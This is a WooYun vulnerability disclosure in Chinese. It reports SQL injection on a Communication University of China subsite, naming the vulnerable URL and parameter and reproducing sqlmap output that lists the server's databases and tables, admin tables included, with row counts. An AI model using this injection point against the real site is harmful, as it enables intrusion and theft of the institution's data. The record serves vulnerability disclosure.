漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0154728
漏洞标题:中国传媒大学某分站sql注入大量信息泄露
相关厂商:中国传媒大学
漏洞作者: 路人甲
提交时间:2015-11-21 17:08
修复时间:2015-11-26 17:10
公开时间:2015-11-26 17:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-21: 细节已通知厂商并且等待厂商处理中
2015-11-26: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
中国传媒大学某分站sql注入大量信息泄露
详细说明:
注入点:http://zsb.cucn.edu.cn/news_more.asp?lm2=69
database:
Database: job
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.blog | 2542 |
| dbo.XsStatistics | 857 |
| dbo.news | 763 |
| dbo.ly | 11 |
| dbo.lm | 10 |
| dbo.LinkLB | 6 |
| dbo.admin | 5 |
| dbo.newsmb | 4 |
| dbo.XsProMB | 3 |
| dbo.LyLB | 2 |
| dbo.XsUserDJ | 2 |
| dbo.config | 1 |
| dbo.link | 1 |
| dbo.lyhf | 1 |
+--------------------------------------------------+---------+
Database: smt
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.blog | 1185 |
| dbo.XsStatistics | 778 |
| dbo.news | 400 |
| dbo.lm | 25 |
| dbo.admin | 7 |
| dbo.newsmb | 4 |
| dbo.UserMessages | 4 |
| dbo.adminLB | 3 |
| dbo.hylm | 3 |
| dbo.XsProMB | 3 |
| dbo.XsUserDJ | 2 |
| dbo.config | 1 |
| dbo.lyhf | 1 |
| dbo.LyLB | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 67941 |
| sys.sysmessages | 67941 |
| sys.dm_os_memory_objects | 24599 |
| sys.syscolumns | 11156 |
| sys.dm_os_buffer_descriptors | 8108 |
| sys.dm_os_memory_cache_entries | 7665 |
| sys.syscacheobjects | 7064 |
| sys.dm_exec_cached_plans | 6805 |
| sys.all_parameters | 6697 |
| sys.system_parameters | 6697 |
| sys.trace_subclass_values | 4722 |
| sys.all_columns | 4254 |
| sys.trace_event_bindings | 3958 |
| sys.system_columns | 3696 |
| sys.dm_os_ring_buffers | 2778 |
| sys.syscomments | 2747 |
| dbo.spt_values | 2346 |
| sys.dm_exec_query_stats | 2271 |
| sys.all_objects | 1807 |
| sys.sysobjects | 1807 |
| sys.system_objects | 1741 |
| sys.database_permissions | 1645 |
| sys.syspermissions | 1644 |
| sys.sysprotects | 1642 |
| sys.all_sql_modules | 1591 |
| sys.system_sql_modules | 1589 |
| sys.dm_os_virtual_address_dump | 1100 |
| sys.dm_os_performance_counters | 710 |
| sys.sysperfinfo | 710 |
| sys.system_internals_partition_columns | 693 |
| sys.columns | 558 |
| sys.dm_exec_query_transformation_stats | 376 |
| sys.stats_columns | 289 |
| sys.all_views | 284 |
| sys.system_views | 284 |
| sys.index_columns | 219 |
| sys.sysindexkeys | 219 |
| sys.dm_os_wait_stats | 194 |
| sys.event_notification_event_types | 193 |
| sys.sysindexes | 171 |
| sys.trace_events | 171 |
| sys.stats | 165 |
| sys.dm_db_index_usage_stats | 149 |
| sys.dm_os_memory_clerks | 141 |
| sys.dm_os_latch_stats | 136 |
| sys.syscharsets | 114 |
| sys.allocation_units | 112 |
| sys.system_internals_allocation_units | 112 |
| sys.dm_os_memory_cache_clock_hands | 108 |
| sys.dm_db_partition_stats | 101 |
| sys.indexes | 101 |
| sys.partitions | 101 |
| sys.system_internals_partitions | 101 |
| sys.system_components_surface_area_configuration | 98 |
| sys.xml_schema_facets | 97 |
| sys.xml_schema_components | 93 |
| sys.dm_os_loaded_modules | 84 |
| sys.xml_schema_types | 77 |
| sys.objects | 66 |
| sys.trace_columns | 65 |
| sys.configurations | 62 |
| sys.sysconfigures | 62 |
| sys.syscurconfigs | 62 |
| sys.dm_os_memory_cache_counters | 54 |
| sys.dm_os_threads | 52 |
| INFORMATION_SCHEMA.COLUMNS | 50 |
| sys.fulltext_document_types | 50 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| sys.dm_os_worker_local_storage | 44 |
| sys.dm_os_workers | 44 |
| sys.dm_os_memory_cache_hash_tables | 41 |
| sys.dm_exec_query_optimizer_info | 38 |
| sys.dm_os_memory_pools | 38 |
| sys.syslanguages | 33 |
| sys.dm_os_tasks | 28 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.dm_db_session_space_usage | 23 |
| sys.dm_db_task_space_usage | 23 |
| sys.dm_exec_sessions | 23 |
| sys.securable_classes | 21 |
| sys.sysprocesses | 21 |
| sys.trace_categories | 21 |
| sys.dm_tran_active_transactions | 20 |
| sys.dm_tran_database_transactions | 20 |
| sys.dm_exec_requests | 19 |
| sys.server_principals | 19 |
| sys.fulltext_languages | 17 |
| sys.server_permissions | 17 |
| sys.xml_schema_component_placements | 17 |
| sys.database_principals | 16 |
| sys.sysusers | 16 |
| INFORMATION_SCHEMA.SCHEMATA | 14 |
| sys.master_files | 14 |
| sys.schemas | 14 |
| sys.service_message_types | 14 |
| sys.sysaltfiles | 14 |
| sys.xml_schema_attributes | 14 |
| sys.dm_os_stacks | 13 |
| sys.dm_os_waiting_tasks | 11 |
| sys.service_contract_message_usages | 11 |
| sys.dm_os_schedulers | 10 |
| sys.syslogins | 10 |
| sys.crypt_properties | 8 |
| sys.database_mirroring | 7 |
| sys.database_recovery_status | 7 |
| sys.databases | 7 |
| sys.sysdatabases | 7 |
| INFORMATION_SCHEMA.TABLES | 6 |
| sys.service_contracts | 6 |
| sys.tables | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| sys.certificates | 5 |
| sys.endpoints | 5 |
| sys.server_role_members | 5 |
| sys.dm_tran_locks | 4 |
| sys.syslockinfo | 4 |
| dbo.MSreplication_options | 3 |
| sys.dm_clr_properties | 3 |
| sys.dm_os_hosts | 3 |
| sys.identity_columns | 3 |
| sys.internal_tables | 3 |
| sys.login_token | 3 |
| sys.service_queue_usages | 3 |
| sys.service_queues | 3 |
| sys.services | 3 |
| sys.syssegments | 3 |
| sys.xml_schema_namespaces | 3 |
| INFORMATION_SCHEMA.ROUTINES | 2 |
| sys.database_files | 2 |
| sys.dm_broker_queue_monitors | 2 |
| sys.dm_exec_connections | 2 |
| sys.dm_fts_memory_pools | 2 |
| sys.key_encryptions | 2 |
| sys.procedures | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_modules | 2 |
| sys.sysfiles | 2 |
| sys.tcp_endpoints | 2 |
| dbo.spt_monitor | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_db_file_space_usage | 1 |
| sys.dm_exec_background_job_queue_stats | 1 |
| sys.dm_os_sys_info | 1 |
| sys.dm_tran_current_transaction | 1 |
| sys.filegroups | 1 |
| sys.linked_logins | 1 |
| sys.routes | 1 |
| sys.servers | 1 |
| sys.sql_logins | 1 |
| sys.symmetric_keys | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysoledbusers | 1 |
| sys.sysservers | 1 |
| sys.traces | 1 |
| sys.user_token | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.syssessions | 380 |
| dbo.MSdbms_datatype_mapping | 325 |
| dbo.sysdatatypemappings | 325 |
| dbo.MSdbms_map | 248 |
| dbo.MSdatatype_mappings | 174 |
| dbo.MSdbms_datatype | 141 |
| dbo.syscategories | 21 |
| dbo.syssubsystems | 10 |
| dbo.MSdbms | 7 |
| dbo.sysmail_configuration | 7 |
| dbo.sysdtscategories | 3 |
| dbo.backupfile | 2 |
| dbo.sysdtspackagefolders90 | 2 |
| dbo.backupfilegroup | 1 |
| dbo.backupmediafamily | 1 |
| dbo.backupmediaset | 1 |
| dbo.backupset | 1 |
| dbo.sysdbmaintplans | 1 |
| dbo.sysmail_servertype | 1 |
| dbo.sysoriginatingservers_view | 1 |
| dbo.systargetservers_view | 1 |
+--------------------------------------------------+---------+
Database: zsb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.ly | 5937 |
| dbo.blog | 1739 |
| dbo.NewsPL | 753 |
| dbo.news | 411 |
| dbo.lyhf | 377 |
| dbo.lm | 11 |
| dbo.newsmb | 5 |
| dbo.XsUserDJ | 2 |
| dbo.admin | 1 |
| dbo.config | 1 |
| dbo.LinkLB | 1 |
| dbo.LyLB | 1 |
+--------------------------------------------------+---------+
权限挺高,不深入了。
漏洞证明:
sqlmap全过程:
修复方案:
还要过滤什么你懂的
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-11-26 17:10
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无